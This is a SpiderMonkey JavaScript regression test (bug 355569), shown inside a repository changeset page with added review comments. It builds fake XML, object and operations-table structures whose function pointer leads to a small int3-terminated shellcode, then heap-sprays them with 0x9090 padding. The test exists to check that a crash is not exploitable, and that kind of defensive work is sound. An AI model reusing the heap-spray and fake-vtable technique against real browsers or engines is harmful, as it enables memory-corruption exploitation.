js/src/tests/js1_8_5/regress/regress-355569.js

Sat, 03 Jan 2015 20:18:00 +0100

author
Michael Schloh von Bennewitz <michael@schloh.com>
date
Sat, 03 Jan 2015 20:18:00 +0100
branch
TOR_BUG_3246
changeset 7
129ffea94266
permissions
-rw-r--r--

Conditionally enable double key logic according to:
private browsing mode or privacy.thirdparty.isolate preference and
implement in GetCookieStringCommon and FindCookie where it counts...
With some reservations about how to convince FindCookie users to test the
condition and pass a nullptr when disabling double key logic.

     1 /* -*- Mode: java; tab-width:8; indent-tabs-mode: nil; c-basic-offset: 4 -*- */
     3 /* This Source Code Form is subject to the terms of the Mozilla Public
     4  * License, v. 2.0. If a copy of the MPL was not distributed with this
     5  * file, You can obtain one at http://mozilla.org/MPL/2.0/. */
var bug = 355569;
// Neither variable is assigned anywhere in this file, so reportCompare() at
// the bottom always sees '' against ''.
var actual = '';
var expect = '';
printBugNumber (bug);
// NOTE(review): `summary` is not declared anywhere in this file; unless the
// test harness defines it, this line throws a ReferenceError before the
// try block below is reached — confirm against the harness.
printStatus (summary);
// Base address handed to makeExploitData(); presumably the address the
// sprayed chunks are meant to cover. exploit() also derives the value it
// boxes from it (targetAddress >> 1).
var targetAddress = 0x12030010;
// Parameters consumed by sprayData():
//   chunkCount strings of roughly (chunkSize - reservedSize) bytes each are
//   built and kept alive; chunkMarker is packed (packData "L") in front of
//   every chunk, and the payload is padded to chunkAlign / 2 UTF-16 units
//   before being repeated.
var sprayParams = {
  chunkSize: 16 * 1024 * 1024,
  chunkCount: 16,
  chunkMarker: 0xdeadface,
  chunkAlign: 0x1000,
  reservedSize: 1024
};
// Returns the payload string that makeExploitData() places at its
// "exploit-code" fragment. Each UTF-16 unit carries two bytes of the x86
// sequence described in the comment below; per that comment the sequence
// ends in int3, a breakpoint trap. The `ctx` argument makeExploitData()
// passes is ignored (the function declares no parameters).
function makeExploitCode() {
  /* mov eax, 0xdeadfeed; mov ebx, eax; mov ecx, eax; mov edx, eax; int3 */
  return "\uEDB8\uADFE\u89DE\u89C3\u89C1\uCCC2";
}
    28 /*==========================================================================*/
    29 /*==========================================================================*/
/*
 * Serialize the values of the array-like `A` (an Array or an `arguments`
 * object) into a string, one template character per value:
 *   s / S  -> one UTF-16 unit holding the low 16 bits of the value
 *   l / L  -> two UTF-16 units, low half first (a little-endian 32-bit word)
 *   =      -> the value's String() form, appended verbatim
 * Any other template character (e.g. the grouping spaces in "LL LL") is
 * skipped and does not consume a value. Numeric values are coerced with
 * `>>> 0` first, so negative or fractional inputs wrap to unsigned 32-bit.
 * Missing values read as undefined and therefore pack as zero.
 */
function packData(template, A) {
  var pieces = [];
  var next = 0;
  var word;
  var pos;
  for (pos = 0; pos < template.length; pos++) {
    switch (template.charAt(pos)) {
      case "s":
      case "S":
        word = A[next++] >>> 0;
        pieces.push(String.fromCharCode(word & 0xffff));
        break;
      case "l":
      case "L": // XXX endian
        word = A[next++] >>> 0;
        pieces.push(String.fromCharCode(word & 0xffff, word >> 16));
        break;
      case "=":
        pieces.push(String(A[next++]));
        break;
      default:
        // Unknown template characters are separators: skip, consume nothing.
        break;
    }
  }
  return pieces.join("");
}
// Two-pass layout builder. `worker(ctx)` appends named fragments with
// ctx.append(name, str); ctx.address(name) returns `address` plus the byte
// offset of that fragment (UTF-16 units * 2), or `address` itself for an
// unknown/undefined name. The worker runs twice: the first pass only
// records offsets (forward references resolve to `address` because offs[k]
// is still undefined), then `result` is cleared and the second pass
// re-emits every fragment with all offsets known. This is only correct
// because a fragment's length does not depend on the address values it
// embeds — true for packData()'s fixed-width "L"/"S" fields, not for "=".
function buildStructure(worker, address) {
  var offs = {}, result = "", context = {
    append: function(k, v) { offs[k] = result.length * 2; result += v; },
    address: function(k) { return address + ((k && offs[k]) || 0); }
  }; worker(context); result = ""; worker(context); return result;
}
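/*
 * Return a string of exactly L UTF-16 units made by repeating `s` and
 * truncating; when L <= s.length this is simply the first L units of `s`
 * (a non-positive L yields ""). Doubling the buffer until it covers half of
 * L keeps the number of concatenations logarithmic in L.
 *
 * The previous version looped forever for an empty `s` with L > 0 because
 * s.length could never grow past L / 2; an empty pattern now returns "",
 * since no string of the requested length can be built from it.
 */
function repeatToLength(s, L) {
  if (L <= s.length) {
    return s.substring(0, L);
  }
  if (s.length === 0) {
    return "";
  }
  var buf = s;
  while (buf.length <= L / 2) {
    buf += buf;
  }
  return buf + buf.substring(0, L - buf.length);
}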
// Fill rooter[0 .. params.chunkCount-1] with large strings so `data` is
// repeated across the heap. `data` is first padded with 0x9090 units up to
// chunkAlign / 2 UTF-16 units (no padding if already longer), then repeated
// to (chunkSize - reservedSize) / 2 units. Every chunk is prefixed with the
// packed chunkMarker and suffixed with its own index in decimal, which makes
// the strings pairwise distinct. Nothing is returned; the strings stay
// reachable through `rooter` (presumably so the GC cannot reclaim them).
function sprayData(data, params, rooter) {
  var marker = packData("L", [ params.chunkMarker ]);
  // A negative length here yields "" via repeatToLength's first branch.
  data += repeatToLength("\u9090", params.chunkAlign / 2 - data.length);
  data = repeatToLength(data, (params.chunkSize - params.reservedSize) / 2);
  for(var i = 0; i < params.chunkCount; i++) {
    rooter[i] = marker + data + i;
  }
}
// Two little-endian 32-bit words (map, slots). The parameter names appear
// to mirror the engine's JSObject struct of the time; layout not verified
// here. Missing arguments pack as zero.
function T_JSObject(map, slots)
{ return packData("LL", arguments); }
// Four little-endian 32-bit words (nrefs, ops, nslots, freeslot); names
// appear to mirror the engine's JSObjectMap struct of the time — not
// verified here.
function T_JSObjectMap(nrefs, ops, nslots, freeslot)
{ return packData("LLLL", arguments); }
// Twenty-four little-endian 32-bit words, one per operation pointer, in the
// parameter order below (names appear to mirror the engine's JSObjectOps
// table of the time — not verified here). The spaces in the template only
// group the fields visually; packData() skips them.
function T_JSObjectOps(
  newObjectMap, destroyObjectMap, lookupProperty, defineProperty,
  getProperty, setProperty, getAttributes, setAttributes,
  deleteProperty, defaultValue, enumerate, checkAccess,
  thisObject, dropProperty, call, construct,
  xdrObject, hasInstance, setProto, setParent,
  mark, clear, getRequiredSlot, setRequiredSlot
) { return packData("LLLLLLLL LLLLLLLL LLLLLLLL", arguments); }
// XML list record: four 32-bit words (object, domnode, parent, name), two
// 16-bit halves (xml_class, xml_flags), the four kids_* words and the two
// xml_target* words — 12 values for the 12 parameters. Names appear to
// mirror the engine's JSXML list layout of the time; not verified here.
function T_JSXML_LIST(
  object, domnode, parent, name, xml_class, xml_flags,
  kids_length, kids_capacity, kids_vector, kids_cursors,
  xml_target, xml_targetprop
) { return packData("LLLLSS LLLL LL", arguments); }
// XML element record: same header as T_JSXML_LIST (four words, two 16-bit
// halves, four kids_* words) followed by the four nses_* and four atrs_*
// words — 18 values for the 18 parameters. Names appear to mirror the
// engine's JSXML element layout of the time; not verified here.
function T_JSXML_ELEMENT(
  object, domnode, parent, name, xml_class, xml_flags,
  kids_length, kids_capacity, kids_vector, kids_cursors,
  nses_length, nses_capacity, nses_vector, nses_cursors,
  atrs_length, atrs_capacity, atrs_vector, atrs_cursors
) { return packData("LLLLSS LLLL LLLL LLLL", arguments); }
    90 /*==========================================================================*/
    91 /*==========================================================================*/
// Build the test data that sprayData() will repeat, laid out as if it
// started at `address` (see buildStructure for how fragment names resolve
// to addresses). The fragments chain by address: the list reports
// kids_length = 1 and its kids_vector points at "xml-kids-vector", whose
// single word points at "xml-element"; that element (xml_class = 1) has its
// `object` word pointing at "object", whose `map` points at "object-map",
// whose `ops` points at "object-ops"; in the ops table only the 23rd word
// (the getRequiredSlot position) is non-zero and points at "exploit-code",
// the string from makeExploitCode(). Every other field is zero. The `ctx`
// passed to makeExploitCode() is ignored by it.
function makeExploitData(address) {
  return buildStructure(function(ctx) {
    ctx.append("xml-list",
      T_JSXML_LIST(0, 0, 0, 0, 0, 0, 1, 0, ctx.address("xml-kids-vector"), 0, 0, 0));
    ctx.append("xml-kids-vector",
      packData("L", [ ctx.address("xml-element") ]));
    ctx.append("xml-element",
      T_JSXML_ELEMENT(ctx.address("object"), 0, 0, 0, 1, 0, 0, 0, 0, 0, /*c*/ 0, 0, 0, 0, /*d*/ 0, 0, 0, 0));
    ctx.append("object",
      T_JSObject(ctx.address("object-map"), 0));
    ctx.append("object-map",
      T_JSObjectMap(0, ctx.address("object-ops"), 0, 0));
    ctx.append("object-ops",
      T_JSObjectOps(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ctx.address("exploit-code"), 0));
    ctx.append("exploit-code",
      makeExploitCode(ctx));
  }, address);
}
// Body of the regression test: spray the structure, then box a value
// derived from targetAddress in a Number object. `this.rooter = {}` stores
// the sprayed strings on `this` (the global object, since the file is not
// strict and exploit() is called as a plain function), keeping them
// reachable for the rest of the run. `numobj` is never read; presumably
// constructing it is the step that reproduced the original crash. The
// status message is the test's own verdict, not a computed result.
function exploit() {
  sprayData(makeExploitData(targetAddress), sprayParams, this.rooter = {});
  var numobj = new Number(targetAddress >> 1);
  printStatus("probably not exploitable");
}
// A crash is what this test guards against; any ordinary exception from
// exploit() is deliberately ignored so the harness still reaches
// reportCompare(). NOTE(review): the empty catch also hides unrelated
// failures inside exploit(), such as a ReferenceError for a missing harness
// function — consider at least `printStatus(String(ex))` for diagnosability.
try
{
    exploit();
}
catch(ex)
{
}
// Neither variable is assigned in this file, so this compares '' with ''.
reportCompare(expect, actual);
